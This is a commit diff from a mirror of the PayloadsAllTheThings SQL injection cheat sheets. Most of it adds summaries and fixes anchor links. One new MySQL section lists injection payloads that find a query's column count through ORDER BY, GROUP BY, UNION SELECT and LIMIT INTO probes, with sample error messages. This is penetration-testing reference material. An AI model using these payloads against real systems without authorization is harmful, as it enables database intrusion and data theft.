mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Merge pull request #116 from nizam0906/master
Added More Updates in SQL Injection
This commit is contained in:
commit
55d1731897
@ -2,6 +2,14 @@
|
|||||||
|
|
||||||
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
|
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Cassandra comment](#cassandra-comment)
|
||||||
|
* [Cassandra - Login Bypass](#cassandra---login-bypass)
|
||||||
|
* [Login Bypass 0](#login-bypass-0)
|
||||||
|
* [Login Bypass 1](#login-bypass-1)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
## Cassandra comment
|
## Cassandra comment
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
|
@ -1,6 +1,12 @@
|
|||||||
# Hibernate Query Language Injection
|
# Hibernate Query Language Injection
|
||||||
|
|
||||||
> Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
|
> Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [HQL Comments](#hql-comments)
|
||||||
|
* [HQL List Columns](#hql-list-columns)
|
||||||
|
* [HQL Error Based](#hql-error-based)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
## HQL Comments
|
## HQL Comments
|
||||||
|
|
||||||
|
@ -5,18 +5,18 @@
|
|||||||
* [MSSQL comments](#mssql-comments)
|
* [MSSQL comments](#mssql-comments)
|
||||||
* [MSSQL version](#mssql-version)
|
* [MSSQL version](#mssql-version)
|
||||||
* [MSSQL database name](#mssql-database-name)
|
* [MSSQL database name](#mssql-database-name)
|
||||||
* [MSSQL List databases](#mssql-list-database)
|
* [MSSQL List databases](#mssql-list-databases)
|
||||||
* [MSSQL List columns](#mssql-list-columns)
|
* [MSSQL List columns](#mssql-list-columns)
|
||||||
* [MSSQL List tables](#mssql-list-tables)
|
* [MSSQL List tables](#mssql-list-tables)
|
||||||
* [MSSQL Extract user/password](#mssql-extract-user-password)
|
* [MSSQL Extract user/password](#mssql-extract-userpassword)
|
||||||
* [MSSQL Union Based](#mssql-union-based)
|
* [MSSQL Union Based](#mssql-union-based)
|
||||||
* [MSSQL Error Based](#mssql-error-based)
|
* [MSSQL Error Based](#mssql-error-based)
|
||||||
* [MSSQL Blind Based](#mssql-blind-based)
|
* [MSSQL Blind Based](#mssql-blind-based)
|
||||||
* [MSSQL Time Based](#mssql-time-based)
|
* [MSSQL Time Based](#mssql-time-based)
|
||||||
* [MSSQL Stacked query](#mssql-stack-query)
|
* [MSSQL Stacked query](#mssql-stacked-query)
|
||||||
* [MSSQL Command execution](#mssql-command-execution)
|
* [MSSQL Command execution](#mssql-command-execution)
|
||||||
* [MSSQL UNC path](#mssql-unc-path)
|
* [MSSQL UNC path](#mssql-unc-path)
|
||||||
* [MSSQL Make user DBA](#mssql-make-user-dba)
|
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
||||||
|
|
||||||
## MSSQL comments
|
## MSSQL comments
|
||||||
|
|
||||||
|
@ -3,10 +3,10 @@
|
|||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [MYSQL Comment](#mysql-comment)
|
* [MYSQL Comment](#mysql-comment)
|
||||||
* [Detect columns number](#detect-columns-number)
|
|
||||||
* [MYSQL Union Based](#mysql-union-based)
|
* [MYSQL Union Based](#mysql-union-based)
|
||||||
* [Extract database with information_schema](#extract-database-with-information-schema)
|
* [Detect columns number](#detect-columns-number)
|
||||||
* [Extract data without information_schema](#extract-data-without-information-schema)
|
* [Extract database with information_schema](#extract-database-with-information_schema)
|
||||||
|
* [Extract columns name without information_schema](#extract-columns-name-without-information_schema)
|
||||||
* [Extract data without columns name](#extract-data-without-columns-name)
|
* [Extract data without columns name](#extract-data-without-columns-name)
|
||||||
* [MYSQL Error Based](#mysql-error-based)
|
* [MYSQL Error Based](#mysql-error-based)
|
||||||
* [MYSQL Error Based - Basic](#mysql-error-based---basic)
|
* [MYSQL Error Based - Basic](#mysql-error-based---basic)
|
||||||
@ -15,10 +15,10 @@
|
|||||||
* [MYSQL Blind](#mysql-blind)
|
* [MYSQL Blind](#mysql-blind)
|
||||||
* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
|
* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
|
||||||
* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
|
* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
|
||||||
* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
|
* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make_set)
|
||||||
* [MYSQL Blind with LIKE](#mysql-blind-with-like)
|
* [MYSQL Blind with LIKE](#mysql-blind-with-like)
|
||||||
* [MYSQL Time Based](#mysql-time-based)
|
* [MYSQL Time Based](#mysql-time-based)
|
||||||
* [Using SLEEP in a subselect](#using-asleep-in-a-subselect)
|
* [Using SLEEP in a subselect](#using-sleep-in-a-subselect)
|
||||||
* [Using conditional statements](#using-conditional-statements)
|
* [Using conditional statements](#using-conditional-statements)
|
||||||
* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
|
* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
|
||||||
* [MYSQL Current queries](#mysql-current-queries)
|
* [MYSQL Current queries](#mysql-current-queries)
|
||||||
@ -46,17 +46,76 @@
|
|||||||
|
|
||||||
## MYSQL Union Based
|
## MYSQL Union Based
|
||||||
|
|
||||||
### Extract database with information_schema
|
### Detect columns number
|
||||||
|
|
||||||
First you need to know the number of columns, you can use `order by`.
|
First you need to know the number of columns
|
||||||
|
|
||||||
|
##### Using `order by` or `group by`
|
||||||
|
|
||||||
|
Keep incrementing the number until you get a False response.
|
||||||
|
Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
order by 1
|
1' ORDER BY 1--+ #True
|
||||||
order by 2
|
1' ORDER BY 2--+ #True
|
||||||
order by 3
|
1' ORDER BY 3--+ #True
|
||||||
...
|
1' ORDER BY 4--+ #False - Query is only using 3 columns
|
||||||
order by XXX
|
#-1' UNION SELECT 1,2,3--+ True
|
||||||
```
|
```
|
||||||
|
or
|
||||||
|
```sql
|
||||||
|
1' GROUP BY 1--+ #True
|
||||||
|
1' GROUP BY 2--+ #True
|
||||||
|
1' GROUP BY 3--+ #True
|
||||||
|
1' GROUP BY 4--+ #False - Query is only using 3 columns
|
||||||
|
#-1' UNION SELECT 1,2,3--+ True
|
||||||
|
```
|
||||||
|
##### Using `order by` or `group by` Error Based
|
||||||
|
Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled.
|
||||||
|
```sql
|
||||||
|
1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+
|
||||||
|
|
||||||
|
# Unknown column '4' in 'order clause'
|
||||||
|
# This error means query uses 3 column
|
||||||
|
#-1' UNION SELECT 1,2,3--+ True
|
||||||
|
```
|
||||||
|
or
|
||||||
|
```sql
|
||||||
|
1' GROUP BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+
|
||||||
|
|
||||||
|
# Unknown column '4' in 'group statement'
|
||||||
|
# This error means query uses 3 column
|
||||||
|
#-1' UNION SELECT 1,2,3--+ True
|
||||||
|
```
|
||||||
|
##### Using `UNION SELECT` Error Based
|
||||||
|
This method works if error showing is enabled
|
||||||
|
```sql
|
||||||
|
1' UNION SELECT @--+ #The used SELECT statements have a different number of columns
|
||||||
|
1' UNION SELECT @,@--+ #The used SELECT statements have a different number of columns
|
||||||
|
1' UNION SELECT @,@,@--+ #No error means query uses 3 column
|
||||||
|
#-1' UNION SELECT 1,2,3--+ True
|
||||||
|
```
|
||||||
|
##### Using `LIMIT INTO` Error Based
|
||||||
|
This method works if error showing is enabled.
|
||||||
|
|
||||||
|
It is useful for finding the number of columns when the injection point is after a LIMIT clause.
|
||||||
|
```sql
|
||||||
|
1' LIMIT 1,1 INTO @--+ #The used SELECT statements have a different number of columns
|
||||||
|
1' LIMIT 1,1 INTO @,@--+ #The used SELECT statements have a different number of columns
|
||||||
|
1' LIMIT 1,1 INTO @,@,@--+ #No error means query uses 3 column
|
||||||
|
#-1' UNION SELECT 1,2,3--+ True
|
||||||
|
```
|
||||||
|
##### Using `SELECT * FROM SOME_EXISTING_TABLE` Error Based
|
||||||
|
This works if you know the table name you're after and error showing is enabled.
|
||||||
|
|
||||||
|
It will return the amount of columns in the table, not the query.
|
||||||
|
|
||||||
|
```sql
|
||||||
|
1' AND (SELECT * FROM Users) = 1--+ #Operand should contain 3 column(s)
|
||||||
|
# This error means query uses 3 column
|
||||||
|
#-1' UNION SELECT 1,2,3--+ True
|
||||||
|
```
|
||||||
|
### Extract database with information_schema
|
||||||
|
|
||||||
Then the following codes will extract the databases'name, tables'name, columns'name.
|
Then the following codes will extract the databases'name, tables'name, columns'name.
|
||||||
|
|
||||||
|
@ -1,5 +1,18 @@
|
|||||||
# Oracle SQL Injection
|
# Oracle SQL Injection
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Oracle SQL version](#oracle-sql-version)
|
||||||
|
* [Oracle SQL database name](#oracle-sql-database-name)
|
||||||
|
* [Oracle SQL List databases](#oracle-sql-list-databases)
|
||||||
|
* [Oracle SQL List columns](#oracle-sql-list-columns)
|
||||||
|
* [Oracle SQL List tables](#oracle-sql-list-tables)
|
||||||
|
* [Oracle SQL Error Based](#oracle-sql-error-based)
|
||||||
|
* [Oracle SQL Blind](#oracle-sql-blind)
|
||||||
|
* [Oracle SQL Time Based](#oracle-sql-time-based)
|
||||||
|
* [Oracle SQL Command execution](#oracle-sql-command-execution)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
## Oracle SQL version
|
## Oracle SQL version
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
@ -21,7 +34,7 @@ SELECT SYS.DATABASE_NAME FROM DUAL;
|
|||||||
SELECT DISTINCT owner FROM all_tables;
|
SELECT DISTINCT owner FROM all_tables;
|
||||||
```
|
```
|
||||||
|
|
||||||
## Oracle SQL List Column
|
## Oracle SQL List Columns
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
|
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
|
||||||
|
@ -20,8 +20,8 @@
|
|||||||
* [PostgreSQL File Read](#postgresql-file-read)
|
* [PostgreSQL File Read](#postgresql-file-read)
|
||||||
* [PostgreSQL File Write](#postgresql-file-write)
|
* [PostgreSQL File Write](#postgresql-file-write)
|
||||||
* [PostgreSQL Command execution](#postgresql-command-execution)
|
* [PostgreSQL Command execution](#postgresql-command-execution)
|
||||||
* [CVE-2019–9193](#cve-2019–9193)
|
* [CVE-2019–9193](#cve-20199193)
|
||||||
* [Using libc.so.6](#using-libc-so-6)
|
* [Using libc.so.6](#using-libcso6)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
## PostgreSQL Comments
|
## PostgreSQL Comments
|
||||||
|
@ -21,7 +21,7 @@ Attempting to manipulate SQL queries may have goals including:
|
|||||||
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
|
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
|
||||||
* [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
|
* [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
|
||||||
* [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
|
* [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
|
||||||
* [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragent-header-referer-cookie)
|
* [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie)
|
||||||
* [Second order injection](#second-order-injection)
|
* [Second order injection](#second-order-injection)
|
||||||
* [Shell](#shell)
|
* [Shell](#shell)
|
||||||
* [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
|
* [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
|
||||||
@ -29,7 +29,7 @@ Attempting to manipulate SQL queries may have goals including:
|
|||||||
* [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
|
* [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
|
||||||
* [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
|
* [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
|
||||||
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
|
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
|
||||||
* [General tamper option and tamper's list](#general-tamper-option-and-tamper-s-list)
|
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
|
||||||
* [Authentication bypass](#authentication-bypass)
|
* [Authentication bypass](#authentication-bypass)
|
||||||
* [Polyglot injection](#polyglot-injection-multicontext)
|
* [Polyglot injection](#polyglot-injection-multicontext)
|
||||||
* [Routed injection](#routed-injection)
|
* [Routed injection](#routed-injection)
|
||||||
|
@ -1,5 +1,18 @@
|
|||||||
# SQLite Injection
|
# SQLite Injection
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [SQLite comments](#sqlite-comments)
|
||||||
|
* [SQLite version](#sqlite-version)
|
||||||
|
* [Integer/String based - Extract table name](#integerstring-based---extract-table-name)
|
||||||
|
* [Integer/String based - Extract column name](#integerstring-based---extract-column-name)
|
||||||
|
* [Boolean - Count number of tables](#boolean---count-number-of-tables)
|
||||||
|
* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
|
||||||
|
* [Boolean - Extract info](#boolean---extract-info)
|
||||||
|
* [Time based](#time-based)
|
||||||
|
* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
|
||||||
|
* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
|
||||||
|
* [References](#references)
|
||||||
## SQLite comments
|
## SQLite comments
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
|
Loading…
Reference in New Issue
Block a user